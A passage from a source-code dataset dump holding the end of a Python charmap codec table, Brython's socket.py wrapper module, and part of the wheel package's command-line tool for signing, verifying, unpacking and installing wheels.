'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\u0126' # 0xA1 -> LATIN CAPITAL LETTER H WITH STROKE
'\u02d8' # 0xA2 -> BREVE
'\xa3' # 0xA3 -> POUND SIGN
'\xa4' # 0xA4 -> CURRENCY SIGN
'\ufffe'
'\u0124' # 0xA6 -> LATIN CAPITAL LETTER H WITH CIRCUMFLEX
'\xa7' # 0xA7 -> SECTION SIGN
'\xa8' # 0xA8 -> DIAERESIS
'\u0130' # 0xA9 -> LATIN CAPITAL LETTER I WITH DOT ABOVE
'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
'\u011e' # 0xAB -> LATIN CAPITAL LETTER G WITH BREVE
'\u0134' # 0xAC -> LATIN CAPITAL LETTER J WITH CIRCUMFLEX
'\xad' # 0xAD -> SOFT HYPHEN
'\ufffe'
'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
'\xb0' # 0xB0 -> DEGREE SIGN
'\u0127' # 0xB1 -> LATIN SMALL LETTER H WITH STROKE
'\xb2' # 0xB2 -> SUPERSCRIPT TWO
'\xb3' # 0xB3 -> SUPERSCRIPT THREE
'\xb4' # 0xB4 -> ACUTE ACCENT
'\xb5' # 0xB5 -> MICRO SIGN
'\u0125' # 0xB6 -> LATIN SMALL LETTER H WITH CIRCUMFLEX
'\xb7' # 0xB7 -> MIDDLE DOT
'\xb8' # 0xB8 -> CEDILLA
'\u0131' # 0xB9 -> LATIN SMALL LETTER DOTLESS I
'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
'\u011f' # 0xBB -> LATIN SMALL LETTER G WITH BREVE
'\u0135' # 0xBC -> LATIN SMALL LETTER J WITH CIRCUMFLEX
'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
'\ufffe'
'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\ufffe'
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\u010a' # 0xC5 -> LATIN CAPITAL LETTER C WITH DOT ABOVE
'\u0108' # 0xC6 -> LATIN CAPITAL LETTER C WITH CIRCUMFLEX
'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\ufffe'
'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\u0120' # 0xD5 -> LATIN CAPITAL LETTER G WITH DOT ABOVE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd7' # 0xD7 -> MULTIPLICATION SIGN
'\u011c' # 0xD8 -> LATIN CAPITAL LETTER G WITH CIRCUMFLEX
'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\u016c' # 0xDD -> LATIN CAPITAL LETTER U WITH BREVE
'\u015c' # 0xDE -> LATIN CAPITAL LETTER S WITH CIRCUMFLEX
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\ufffe'
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\u010b' # 0xE5 -> LATIN SMALL LETTER C WITH DOT ABOVE
'\u0109' # 0xE6 -> LATIN SMALL LETTER C WITH CIRCUMFLEX
'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\ufffe'
'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\u0121' # 0xF5 -> LATIN SMALL LETTER G WITH DOT ABOVE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf7' # 0xF7 -> DIVISION SIGN
'\u011d' # 0xF8 -> LATIN SMALL LETTER G WITH CIRCUMFLEX
'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\u016d' # 0xFD -> LATIN SMALL LETTER U WITH BREVE
'\u015d' # 0xFE -> LATIN SMALL LETTER S WITH CIRCUMFLEX
'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| gpl-3.0 |
coursemdetw/2014c2 | wsgi/static/Brython2.1.3-20140704-213726/Lib/socket.py | 730 | 14913 | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
fromshare() -- create a socket object from data received from socket.share() [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
import os, sys, io
try:
import errno
except ImportError:
errno = None
EBADF = getattr(errno, 'EBADF', 9)
EAGAIN = getattr(errno, 'EAGAIN', 11)
EWOULDBLOCK = getattr(errno, 'EWOULDBLOCK', 11)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
errorTab = {}
errorTab[10004] = "The operation was interrupted."
errorTab[10009] = "A bad file handle was passed."
errorTab[10013] = "Permission denied."
errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
errorTab[10022] = "An invalid operation was attempted."
errorTab[10035] = "The socket operation would block"
errorTab[10036] = "A blocking operation is already in progress."
errorTab[10048] = "The network address is in use."
errorTab[10054] = "The connection has been reset."
errorTab[10058] = "The network has been shut down."
errorTab[10060] = "The operation timed out."
errorTab[10061] = "Connection refused."
errorTab[10063] = "The name is too long."
errorTab[10064] = "The host is down."
errorTab[10065] = "The host is unreachable."
__all__.append("errorTab")
class socket(_socket.socket):
"""A subclass of _socket.socket adding the makefile() method."""
__slots__ = ["__weakref__", "_io_refs", "_closed"]
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None):
_socket.socket.__init__(self, family, type, proto, fileno)
self._io_refs = 0
self._closed = False
def __enter__(self):
return self
def __exit__(self, *args):
if not self._closed:
self.close()
def __repr__(self):
"""Wrap __repr__() to reveal the real class name."""
s = _socket.socket.__repr__(self)
if s.startswith("<socket object"):
s = "<%s.%s%s%s" % (self.__class__.__module__,
self.__class__.__name__,
getattr(self, '_closed', False) and " [closed] " or "",
s[7:])
return s
def __getstate__(self):
raise TypeError("Cannot serialize socket object")
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource.
"""
fd = dup(self.fileno())
sock = self.__class__(self.family, self.type, self.proto, fileno=fd)
sock.settimeout(self.gettimeout())
return sock
def accept(self):
"""accept() -> (socket object, address info)
Wait for an incoming connection. Return a new socket
representing the connection, and the address of the client.
For IP sockets, the address info is a pair (hostaddr, port).
"""
fd, addr = self._accept()
sock = socket(self.family, self.type, self.proto, fileno=fd)
# Issue #7995: if no default timeout is set and the listening
# socket had a (non-zero) timeout, force the new socket in blocking
# mode to override platform-specific socket flags inheritance.
if getdefaulttimeout() is None and self.gettimeout():
sock.setblocking(True)
return sock, addr
def makefile(self, mode="r", buffering=None, *,
encoding=None, errors=None, newline=None):
"""makefile(...) -> an I/O stream connected to the socket
The arguments are as for io.open() after the filename,
except the only mode characters supported are 'r', 'w' and 'b'.
The semantics are similar too. (XXX refactor to share code?)
"""
for c in mode:
if c not in {"r", "w", "b"}:
raise ValueError("invalid mode %r (only r, w, b allowed)")
writing = "w" in mode
reading = "r" in mode or not writing
assert reading or writing
binary = "b" in mode
rawmode = ""
if reading:
rawmode += "r"
if writing:
rawmode += "w"
raw = SocketIO(self, rawmode)
self._io_refs += 1
if buffering is None:
buffering = -1
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
if not binary:
raise ValueError("unbuffered streams must be binary")
return raw
if reading and writing:
buffer = io.BufferedRWPair(raw, raw, buffering)
elif reading:
buffer = io.BufferedReader(raw, buffering)
else:
assert writing
buffer = io.BufferedWriter(raw, buffering)
if binary:
return buffer
text = io.TextIOWrapper(buffer, encoding, errors, newline)
text.mode = mode
return text
def _decref_socketios(self):
if self._io_refs > 0:
self._io_refs -= 1
if self._closed:
self.close()
def _real_close(self, _ss=_socket.socket):
# This function should not reference any globals. See issue #808164.
_ss.close(self)
def close(self):
# This function should not reference any globals. See issue #808164.
self._closed = True
if self._io_refs <= 0:
self._real_close()
def detach(self):
"""detach() -> file descriptor
Close the socket object without closing the underlying file descriptor.
The object cannot be used after this call, but the file descriptor
can be reused for other purposes. The file descriptor is returned.
"""
self._closed = True
return super().detach()
def fromfd(fd, family, type, proto=0):
""" fromfd(fd, family, type[, proto]) -> socket object
Create a socket object from a duplicate of the given file
descriptor. The remaining arguments are the same as for socket().
"""
nfd = dup(fd)
return socket(family, type, proto, nfd)
if hasattr(_socket.socket, "share"):
def fromshare(info):
""" fromshare(info) -> socket object
Create a socket object from a the bytes object returned by
socket.share(pid).
"""
return socket(0, 0, 0, info)
if hasattr(_socket, "socketpair"):
def socketpair(family=None, type=SOCK_STREAM, proto=0):
"""socketpair([family[, type[, proto]]]) -> (socket object, socket object)
Create a pair of socket objects from the sockets returned by the platform
socketpair() function.
The arguments are the same as for socket() except the default family is
AF_UNIX if defined on the platform; otherwise, the default is AF_INET.
"""
if family is None:
try:
family = AF_UNIX
except NameError:
family = AF_INET
a, b = _socket.socketpair(family, type, proto)
a = socket(family, type, proto, a.detach())
b = socket(family, type, proto, b.detach())
return a, b
_blocking_errnos = { EAGAIN, EWOULDBLOCK }
class SocketIO(io.RawIOBase):
"""Raw I/O implementation for stream sockets.
This class supports the makefile() method on sockets. It provides
the raw I/O interface on top of a socket object.
"""
# One might wonder why not let FileIO do the job instead. There are two
# main reasons why FileIO is not adapted:
# - it wouldn't work under Windows (where you can't used read() and
# write() on a socket handle)
# - it wouldn't work with socket timeouts (FileIO would ignore the
# timeout and consider the socket non-blocking)
# XXX More docs
def __init__(self, sock, mode):
if mode not in ("r", "w", "rw", "rb", "wb", "rwb"):
raise ValueError("invalid mode: %r" % mode)
io.RawIOBase.__init__(self)
self._sock = sock
if "b" not in mode:
mode += "b"
self._mode = mode
self._reading = "r" in mode
self._writing = "w" in mode
self._timeout_occurred = False
def readinto(self, b):
"""Read up to len(b) bytes into the writable buffer *b* and return
the number of bytes read. If the socket is non-blocking and no bytes
are available, None is returned.
If *b* is non-empty, a 0 return value indicates that the connection
was shutdown at the other end.
"""
self._checkClosed()
self._checkReadable()
if self._timeout_occurred:
raise IOError("cannot read from timed out object")
while True:
try:
return self._sock.recv_into(b)
except timeout:
self._timeout_occurred = True
raise
except InterruptedError:
continue
except error as e:
if e.args[0] in _blocking_errnos:
return None
raise
def write(self, b):
"""Write the given bytes or bytearray object *b* to the socket
and return the number of bytes written. This can be less than
len(b) if not all data could be written. If the socket is
non-blocking and no bytes could be written None is returned.
"""
self._checkClosed()
self._checkWritable()
try:
return self._sock.send(b)
except error as e:
# XXX what about EINTR?
if e.args[0] in _blocking_errnos:
return None
raise
def readable(self):
"""True if the SocketIO is open for reading.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._reading
def writable(self):
"""True if the SocketIO is open for writing.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._writing
def seekable(self):
"""True if the SocketIO is open for seeking.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return super().seekable()
def fileno(self):
"""Return the file descriptor of the underlying socket.
"""
self._checkClosed()
return self._sock.fileno()
@property
def name(self):
if not self.closed:
return self.fileno()
else:
return -1
@property
def mode(self):
return self._mode
def close(self):
"""Close the SocketIO object. This doesn't close the underlying
socket, except if all references to it have disappeared.
"""
if self.closed:
return
io.RawIOBase.close(self)
self._sock._decref_socketios()
self._sock = None
def getfqdn(name=''):
"""Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned.
"""
name = name.strip()
if not name or name == '0.0.0.0':
name = gethostname()
try:
hostname, aliases, ipaddrs = gethostbyaddr(name)
except error:
pass
else:
aliases.insert(0, hostname)
for name in aliases:
if '.' in name:
break
else:
name = hostname
return name
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
err = None
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise error("getaddrinfo returns an empty list")
| gpl-2.0 |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/wheel/tool/__init__.py | 238 | 13310 | """
Wheel command-line utility.
"""
import os
import hashlib
import sys
import json
import wheel.paths
from glob import iglob
from .. import signatures
from ..util import (urlsafe_b64decode, urlsafe_b64encode, native, binary,
matches_requirement)
from ..install import WheelFile
def require_pkgresources(name):
try:
import pkg_resources
except ImportError:
raise RuntimeError("'{0}' needs pkg_resources (part of setuptools).".format(name))
import argparse
class WheelError(Exception): pass
# For testability
def get_keyring():
try:
from ..signatures import keys
import keyring
except ImportError:
raise WheelError("Install wheel[signatures] (requires keyring, pyxdg) for signatures.")
return keys.WheelKeys, keyring
def keygen(get_keyring=get_keyring):
"""Generate a public/private key pair."""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wk = WheelKeys().load()
keypair = ed25519ll.crypto_sign_keypair()
vk = native(urlsafe_b64encode(keypair.vk))
sk = native(urlsafe_b64encode(keypair.sk))
kr = keyring.get_keyring()
kr.set_password("wheel", vk, sk)
sys.stdout.write("Created Ed25519 keypair with vk={0}\n".format(vk))
if isinstance(kr, keyring.backends.file.BaseKeyring):
sys.stdout.write("in {0}\n".format(kr.file_path))
else:
sys.stdout.write("in %r\n" % kr.__class__)
sk2 = kr.get_password('wheel', vk)
if sk2 != sk:
raise WheelError("Keyring is broken. Could not retrieve secret key.")
sys.stdout.write("Trusting {0} to sign and verify all packages.\n".format(vk))
wk.add_signer('+', vk)
wk.trust('+', vk)
wk.save()
def sign(wheelfile, replace=False, get_keyring=get_keyring):
"""Sign a wheel"""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wf = WheelFile(wheelfile, append=True)
wk = WheelKeys().load()
name = wf.parsed_filename.group('name')
sign_with = wk.signers(name)[0]
sys.stdout.write("Signing {0} with {1}\n".format(name, sign_with[1]))
vk = sign_with[1]
kr = keyring.get_keyring()
sk = kr.get_password('wheel', vk)
keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)),
urlsafe_b64decode(binary(sk)))
record_name = wf.distinfo_name + '/RECORD'
sig_name = wf.distinfo_name + '/RECORD.jws'
if sig_name in wf.zipfile.namelist():
raise WheelError("Wheel is already signed.")
record_data = wf.zipfile.read(record_name)
payload = {"hash":"sha256=" + native(urlsafe_b64encode(hashlib.sha256(record_data).digest()))}
sig = signatures.sign(payload, keypair)
wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
wf.zipfile.close()
def unsign(wheelfile):
"""
Remove RECORD.jws from a wheel by truncating the zip file.
RECORD.jws must be at the end of the archive. The zip file must be an
ordinary archive, with the compressed files and the directory in the same
order, and without any non-zip content after the truncation point.
"""
import wheel.install
vzf = wheel.install.VerifyingZipFile(wheelfile, "a")
info = vzf.infolist()
if not (len(info) and info[-1].filename.endswith('/RECORD.jws')):
raise WheelError("RECORD.jws not found at end of archive.")
vzf.pop()
vzf.close()
def verify(wheelfile):
"""Verify a wheel.
The signature will be verified for internal consistency ONLY and printed.
Wheel's own unpack/install commands verify the manifest against the
signature and file contents.
"""
wf = WheelFile(wheelfile)
sig_name = wf.distinfo_name + '/RECORD.jws'
sig = json.loads(native(wf.zipfile.open(sig_name).read()))
verified = signatures.verify(sig)
sys.stderr.write("Signatures are internally consistent.\n")
sys.stdout.write(json.dumps(verified, indent=2))
sys.stdout.write('\n')
def unpack(wheelfile, dest='.'):
"""Unpack a wheel.
Wheel content will be unpacked to {dest}/{name}-{ver}, where {name}
is the package name and {ver} its version.
:param wheelfile: The path to the wheel.
:param dest: Destination directory (default to current directory).
"""
wf = WheelFile(wheelfile)
namever = wf.parsed_filename.group('namever')
destination = os.path.join(dest, namever)
sys.stderr.write("Unpacking to: %s\n" % (destination))
wf.zipfile.extractall(destination)
wf.zipfile.close()
def install(requirements, requirements_file=None,
wheel_dirs=None, force=False, list_files=False,
dry_run=False):
"""Install wheels.
:param requirements: A list of requirements or wheel files to install.
:param requirements_file: A file containing requirements to install.
:param wheel_dirs: A list of directories to search for wheels.
:param force: Install a wheel file even if it is not compatible.
:param list_files: Only list the files to install, don't install them.
:param dry_run: Do everything but the actual install.
"""
# If no wheel directories specified, use the WHEELPATH environment
# variable, or the current directory if that is not set.
if not wheel_dirs:
wheelpath = os.getenv("WHEELPATH")
if wheelpath:
wheel_dirs = wheelpath.split(os.pathsep)
else:
wheel_dirs = [ os.path.curdir ]
# Get a list of all valid wheels in wheel_dirs
all_wheels = []
for d in wheel_dirs:
for w in os.listdir(d):
if w.endswith('.whl'):
wf = WheelFile(os.path.join(d, w))
if wf.compatible:
all_wheels.append(wf)
# If there is a requirements file, add it to the list of requirements
if requirements_file:
# If the file doesn't exist, search for it in wheel_dirs
# This allows standard requirements files to be stored with the
# wheels.
if not os.path.exists(requirements_file):
for d in wheel_dirs:
name = os.path.join(d, requirements_file)
if os.path.exists(name):
requirements_file = name
break
with open(requirements_file) as fd:
requirements.extend(fd)
to_install = []
for req in requirements:
if req.endswith('.whl'):
# Explicitly specified wheel filename
if os.path.exists(req):
wf = WheelFile(req)
if wf.compatible or force:
to_install.append(wf)
else:
msg = ("{0} is not compatible with this Python. "
"--force to install anyway.".format(req))
raise WheelError(msg)
else:
# We could search on wheel_dirs, but it's probably OK to
# assume the user has made an error.
raise WheelError("No such wheel file: {}".format(req))
continue
# We have a requirement spec
# If we don't have pkg_resources, this will raise an exception
matches = matches_requirement(req, all_wheels)
if not matches:
raise WheelError("No match for requirement {}".format(req))
to_install.append(max(matches))
# We now have a list of wheels to install
if list_files:
sys.stdout.write("Installing:\n")
if dry_run:
return
for wf in to_install:
if list_files:
sys.stdout.write(" {0}\n".format(wf.filename))
continue
wf.install(force=force)
wf.zipfile.close()
def install_scripts(distributions):
"""
Regenerate the entry_points console_scripts for the named distribution.
"""
try:
from setuptools.command import easy_install
import pkg_resources
except ImportError:
raise RuntimeError("'wheel install_scripts' needs setuptools.")
for dist in distributions:
pkg_resources_dist = pkg_resources.get_distribution(dist)
install = wheel.paths.get_install_command(dist)
command = easy_install.easy_install(install.distribution)
command.args = ['wheel'] # dummy argument
command.finalize_options()
command.install_egg_scripts(pkg_resources_dist)
def convert(installers, dest_dir, verbose):
require_pkgresources('wheel convert')
# Only support wheel convert if pkg_resources is present
from ..wininst2wheel import bdist_wininst2wheel
from ..egg2wheel import egg2wheel
for pat in installers:
for installer in iglob(pat):
if os.path.splitext(installer)[1] == '.egg':
conv = egg2wheel
else:
conv = bdist_wininst2wheel
if verbose:
sys.stdout.write("{0}... ".format(installer))
sys.stdout.flush()
conv(installer, dest_dir)
if verbose:
sys.stdout.write("OK\n")
def parser():
p = argparse.ArgumentParser()
s = p.add_subparsers(help="commands")
def keygen_f(args):
keygen()
keygen_parser = s.add_parser('keygen', help='Generate signing key')
keygen_parser.set_defaults(func=keygen_f)
def sign_f(args):
sign(args.wheelfile)
sign_parser = s.add_parser('sign', help='Sign wheel')
sign_parser.add_argument('wheelfile', help='Wheel file')
sign_parser.set_defaults(func=sign_f)
def unsign_f(args):
unsign(args.wheelfile)
unsign_parser = s.add_parser('unsign', help=unsign.__doc__)
unsign_parser.add_argument('wheelfile', help='Wheel file')
unsign_parser.set_defaults(func=unsign_f)
def verify_f(args):
verify(args.wheelfile)
verify_parser = s.add_parser('verify', help=verify.__doc__)
verify_parser.add_argument('wheelfile', help='Wheel file')
verify_parser.set_defaults(func=verify_f)
def unpack_f(args):
unpack(args.wheelfile, args.dest)
unpack_parser = s.add_parser('unpack', help='Unpack wheel')
unpack_parser.add_argument('--dest', '-d', help='Destination directory',
default='.')
unpack_parser.add_argument('wheelfile', help='Wheel file')
unpack_parser.set_defaults(func=unpack_f)
def install_f(args):
install(args.requirements, args.requirements_file,
args.wheel_dirs, args.force, args.list_files)
install_parser = s.add_parser('install', help='Install wheels')
install_parser.add_argument('requirements', nargs='*',
help='Requirements to install.')
install_parser.add_argument('--force', default=False,
action='store_true',
help='Install incompatible wheel files.')
install_parser.add_argument('--wheel-dir', '-d', action='append',
